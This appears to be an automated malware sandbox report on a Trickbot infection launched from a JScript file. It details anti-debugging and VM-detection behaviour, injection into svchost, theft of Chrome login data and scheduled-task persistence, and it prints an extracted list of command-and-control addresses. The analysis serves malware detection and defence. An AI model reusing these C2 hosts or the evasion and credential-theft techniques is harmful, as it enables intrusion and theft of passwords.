Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA597D3h 0x00000033 call 2AA4F876h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59544h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA597D3h 0x00000031 call 2AA4FD36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59810h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA598B3h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59130h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59835h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FB96h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59490h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59524h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA598B3h 0x00000033 call 2AA4FEB6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA594E4h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59453h 0x00000031 call 2AA4FEB6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59490h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA597D3h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59915h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FD36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59810h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc

Contains functionality for execution timing, often used to detect debuggers

Show sources

Source: C:\Windows\System32\svchost.exe

Code function: 14_2_00065950 rdtsc

14_2_00065950

Contains functionality to query network adapater information

Show sources

Source: C:\Windows\System32\svchost.exe	Code function: GetAdaptersInfo,	14_2_00067AE0
Source: C:\Windows\System32\svchost.exe	Code function: GetAdaptersInfo,	18_2_00067AE0
Source: C:\Windows\System32\svchost.exe	Code function: GetAdaptersInfo,	21_2_00067AE0

Found WSH timer for Javascript or VBS script (likely evasive script)

Show sources

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Show sources

Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 1320			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 560			Jump to behavior

Found evasive API chain (date check)

Show sources

Source: C:\Windows\System32\svchost.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_36-72823

Found evasive API chain checking for process token information

Show sources

Source: C:\Windows\System32\svchost.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_14-11312

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\System32\wscript.exe TID: 3468	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\wscript.exe TID: 3564	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\wscript.exe TID: 3728	Thread sleep time: -660000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3252	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Windows\System32\taskeng.exe TID: 3528	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\taskeng.exe TID: 4080	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2888	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3436	Thread sleep time: -69000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3268	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2888	Thread sleep time: -40000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2888	Thread sleep count: 1320 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2888	Thread sleep time: -26400000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3944	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3944	Thread sleep count: 560 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3812	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3260	Thread sleep time: -1020000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3260	Thread sleep time: -60000s >= -30000s	Jump to behavior

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Show sources

Source: C:\Windows\System32\svchost.exe

WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_ComputerSystem

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Show sources

Source: C:\Windows\System32\svchost.exe

WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Show sources

Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00061180 FindFirstFileW,FindNextFileW,FindClose,	14_2_00061180
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_0006BD80 FindFirstFileW,FindNextFileW,	18_2_0006BD80
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00061180 FindFirstFileW,FindNextFileW,FindClose,	18_2_00061180
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_000782C0 FindFirstFileW,FindNextFileW,	18_2_000782C0
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_00061180 FindFirstFileW,FindNextFileW,FindClose,	21_2_00061180

Contains functionality to query system information

Show sources

Source: C:\Windows\System32\svchost.exe

Code function: 36_2_00000001800701C0 GetSystemInfo,

36_2_00000001800701C0

Enumerates the file system

Show sources

Source: C:\Windows\System32\svchost.exe	File opened: C:\Windows\system32\config\systemprofile\AppData\Roaming\Intel\Wireless\	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File opened: C:\Windows\system32\config\systemprofile\AppData\Roaming\	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File opened: C:\Windows\system32\taskschd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File opened: C:\Windows\system32\config\systemprofile\AppData\Roaming\Intel\Wireless\CrashDumps\	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File opened: C:\Windows\system32\bcryptprimitives.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File opened: C:\Windows\system32\config\systemprofile\AppData\Roaming\Intel\	Jump to behavior

Queries a list of all running processes

Show sources

Source: C:\Windows\System32\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers

Show sources

Source: C:\Windows\System32\svchost.exe

Code function: 14_2_00065950 rdtsc

14_2_00065950

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Show sources

Source: C:\Windows\System32\svchost.exe

Code function: 14_2_000636E0 LdrLoadDll,

14_2_000636E0

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Show sources

Source: C:\Windows\System32\svchost.exe

Code function: 36_2_00000001800BA4BC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

36_2_00000001800BA4BC

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Windows\System32\svchost.exe

Code function: 36_2_00000001800949E0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

36_2_00000001800949E0

Contains functionality to read the PEB

Show sources

Source: C:\Users\user\AppData\Local\Temp\431846743.exe	Code function: 13_2_004010DA mov eax, dword ptr fs:[00000030h]	13_2_004010DA
Source: C:\Users\user\AppData\Local\Temp\431846743.exe	Code function: 13_2_00310350 mov eax, dword ptr fs:[00000030h]	13_2_00310350
Source: C:\Users\user\AppData\Local\Temp\431846743.exe	Code function: 13_2_00320467 mov eax, dword ptr fs:[00000030h]	13_2_00320467
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe	Code function: 17_2_004010DA mov eax, dword ptr fs:[00000030h]	17_2_004010DA
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe	Code function: 17_2_00240350 mov eax, dword ptr fs:[00000030h]	17_2_00240350
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe	Code function: 17_2_002F0467 mov eax, dword ptr fs:[00000030h]	17_2_002F0467
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe	Code function: 20_2_00440350 mov eax, dword ptr fs:[00000030h]	20_2_00440350
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe	Code function: 20_2_00450467 mov eax, dword ptr fs:[00000030h]	20_2_00450467

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Show sources

Source: C:\Windows\System32\svchost.exe

Code function: 36_2_0000000180074148 GetProcessHeap,HeapFree,

36_2_0000000180074148

Enables debug privileges

Show sources

Source: C:\Windows\System32\svchost.exe

Process token adjusted: Debug

Jump to behavior

Contains functionality to register its own exception handler

Show sources

Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0006B160 RtlAddVectoredExceptionHandler,SetCurrentDirectoryW,CoUninitialize,RtlExitUserProcess,	14_2_0006B160
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_0006B160 RtlAddVectoredExceptionHandler,SetCurrentDirectoryW,CreateThread,SleepEx,	18_2_0006B160
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_0006B160 RtlAddVectoredExceptionHandler,SetCurrentDirectoryW,RtlExitUserProcess,	21_2_0006B160
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800BA4BC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	36_2_00000001800BA4BC
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800B4B30 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	36_2_00000001800B4B30
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800D5ED0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	36_2_00000001800D5ED0

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files

Show sources

Source: C:\Windows\System32\wscript.exe

File created: 431846743.exe.9.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\System32\wscript.exe

Network Connect: 185.195.237.14 80

Jump to behavior

Hijacks the control flow in another process

Show sources

Source: C:\Windows\System32\svchost.exe

Memory written: PID: 2980 base: 180107000 value: FF

Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Windows\System32\svchost.exe	Memory written: C:\Windows\System32\svchost.exe base: 180000000 value starts with: 4D5A			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Memory written: C:\Windows\System32\svchost.exe base: 180000000 value starts with: 4D5A			Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: svchost.exe, 00000024.00000002.56182011171.0000000000770000.00000002.00000001.sdmp, svchost.exe, 00000027.00000002.56183867985.00000000007F0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: svchost.exe, 00000024.00000002.56182011171.0000000000770000.00000002.00000001.sdmp, svchost.exe, 00000027.00000002.56183867985.00000000007F0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: svchost.exe, 00000024.00000002.56182011171.0000000000770000.00000002.00000001.sdmp, svchost.exe, 00000027.00000002.56183867985.00000000007F0000.00000002.00000001.sdmp	Binary or memory string: Program Manager>

Language, Device and Operating System Detection:

Contains functionality locales information (e.g. system language)

Show sources

Source: C:\Windows\System32\svchost.exe	Code function: EnumSystemLocalesW,	36_2_00000001800C6F78
Source: C:\Windows\System32\svchost.exe	Code function: TranslateName,TranslateName,IsValidCodePage,wcschr,wcschr,GetLocaleInfoW,	36_2_00000001800D13E8
Source: C:\Windows\System32\svchost.exe	Code function: GetLocaleInfoW,	36_2_00000001800C7504
Source: C:\Windows\System32\svchost.exe	Code function: EnumSystemLocalesW,	36_2_00000001800D16F4
Source: C:\Windows\System32\svchost.exe	Code function: EnumSystemLocalesW,	36_2_00000001800D17C4
Source: C:\Windows\System32\svchost.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	36_2_00000001800D1BEC
Source: C:\Windows\System32\svchost.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	36_2_00000001800D1DD4

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Contains functionality to query local / system time

Show sources

Source: C:\Windows\System32\svchost.exe

Code function: 36_2_00000001800B4C7C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,RtlQueryPerformanceCounter,

36_2_00000001800B4C7C

Contains functionality to query time zone information

Show sources

Source: C:\Windows\System32\svchost.exe

Code function: 36_2_00000001800C8368 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

36_2_00000001800C8368

Queries the cryptographic machine GUID

Show sources

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Trickbot

Show sources

Source: Yara match	File source: 00000012.00000002.56178609261.00000000003A7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 284, type: MEMORY

Contains functionality to steal Internet Explorer form passwords

Show sources

Source: C:\Windows\System32\svchost.exe

Code function: Software\Microsoft\Internet Explorer\IntelliForms\Storage2

36_2_0000000180096B40

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Remote Access Functionality:

Yara detected Trickbot

Show sources

Source: Yara match	File source: 00000012.00000002.56178609261.00000000003A7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 284, type: MEMORY

Malware Configuration

Threatname: Trickbot

{"C2 list": ["181.196.207.202:449", "82.146.62.520:443", "8.91.10.8:443", "129.134.18.23:449", "186.232.91.240:449", "5.182.210.226:443", "85.204.116.128:443", "185.62.188.34:443", "79.143.31.246:443", "93.189.46.122:443", "31.184.254.50:443", "195.123.217.226:443", "185.99.2.117:443", "104.168.96.113:443", "188.165.62.36:443", "5.182.210.246:443", "185.142.99.8:443", "185.252.144.135:443", "82.146.62.52:443", "212.109.220.111:443", "91.235.129.25:443", "5.182.210.109:443", "190.214.13.2:449", "181.140.173.186:449", "181.129.104.139:449", "181.113.28.146:449", "181.112.157.42:449", "170.84.78.224:449", "200.21.51.38:449", "46.174.235.36:449", "36.89.85.103:449", "181.129.134.18:449", "186.71.150.23:449", "131.161.253.190:449", "200.127.121.99:449", "114.8.133.71:449", "119.252.165.75:449", "121.100.19.18:449", "202.29.215.114:449", "180.180.216.177:449", "171.100.142.238:449"], "modules": ["networkDll", "pwgrab", "mcconf", "systeminfo"]}

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Simulations

Behavior and APIs

Time	Type	Description
14:12:37	API Interceptor	1002x Sleep call for process: wscript.exe modified
14:15:10	API Interceptor	1629x Sleep call for process: svchost.exe modified
14:15:12	Task Scheduler	Run new task: Windows Net Core path: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe
14:16:01	API Interceptor	22x Sleep call for process: 231824723.exe modified
14:16:01	API Interceptor	460x Sleep call for process: taskeng.exe modified

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

Source	Rule	Description	Author
00000010.00000003.56164497578.00000000008AB000.00000004.00000001.sdmp	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
00000012.00000002.56178609261.00000000003A7000.00000004.00000020.sdmp	JoeSecurity_Trickbot_1	Yara detected Trickbot	Joe Security
Process Memory Space: svchost.exe PID: 284	JoeSecurity_Trickbot	Yara detected Trickbot	Joe Security
Process Memory Space: svchost.exe PID: 284	JoeSecurity_Trickbot_1	Yara detected Trickbot	Joe Security
Process Memory Space: svchost.exe PID: 3172	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
Process Memory Space: taskeng.exe PID: 3388	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security

Unpacked PEs

No yara matches

Sigma Overview

No Sigma rule has matched

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Startup

System is w7x64native

wscript.exe (PID: 3400 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\Monet.jse' 578 MD5: 045451FA238A75305CC26AC982472367)

wscript.exe (PID: 3692 cmdline: 'C:\Windows\System32\wscript.exe' /B /E:JScript 'C:\Users\user\AppData\Local\Temp\431846743.hum' MD5: 045451FA238A75305CC26AC982472367)

431846743.exe (PID: 3116 cmdline: 'C:\Users\user\AppData\Local\Temp\431846743.exe' MD5: 2EA93B2945CCF91D29B4FAACC582174A)

svchost.exe (PID: 3172 cmdline: C:\Windows\system32\svchost.exe MD5: C78655BC80301D76ED4FEF1C1EA40A7D)

taskeng.exe (PID: 3388 cmdline: taskeng.exe {09EF86CB-0344-4609-A443-6612E4A0A019} S-1-5-18:NT AUTHORITY\System:Service: MD5: 65EA57712340C09B1B0C427B4848AE05)

231824723.exe (PID: 3088 cmdline: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe MD5: 2EA93B2945CCF91D29B4FAACC582174A)

svchost.exe (PID: 284 cmdline: C:\Windows\system32\svchost.exe MD5: C78655BC80301D76ED4FEF1C1EA40A7D)

svchost.exe (PID: 2980 cmdline: svchost.exe MD5: C78655BC80301D76ED4FEF1C1EA40A7D)

svchost.exe (PID: 4072 cmdline: svchost.exe MD5: C78655BC80301D76ED4FEF1C1EA40A7D)

231824723.exe (PID: 3040 cmdline: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe MD5: 2EA93B2945CCF91D29B4FAACC582174A)

svchost.exe (PID: 3940 cmdline: C:\Windows\system32\svchost.exe MD5: C78655BC80301D76ED4FEF1C1EA40A7D)

cleanup

Created / dropped Files

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	SQLite 3.x database
Size (bytes):	92160
Entropy (8bit):	0.9926428823872716
Encrypted:	false
MD5:	A18C31882924651A20F440C2A7100F23
SHA1:	1C5CE207B7A28EE25C85DBEE062AAF72290F687A
SHA-256:	D37C5E6CBE0AEA2DA059C337C6635EBE28D4DC00A0766D80CA919C8BDDEAC1EF
SHA-512:	A7945F39289077D9326CE8662F7381A6922DDF049DDC7FF434E3831F9AC017DB99FE542AC721ADF2C0AC7E601C41A709C266CC0FCB7DFFDA3E86735F4FDE2660
Malicious:	true
Reputation:	low
Preview:	SQLite format 3......@ .........................................................................-.............o.+.......B.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................-.......5tableloginslogins.CREATE TABLE "logins" (origin_url VARCHAR NOT NULL, action_url VARCHAR, username_element VARCHAR, username_value VARCHAR, password_element VARCHAR, password_value BLOB, submit_element VARCHAR, signon_real

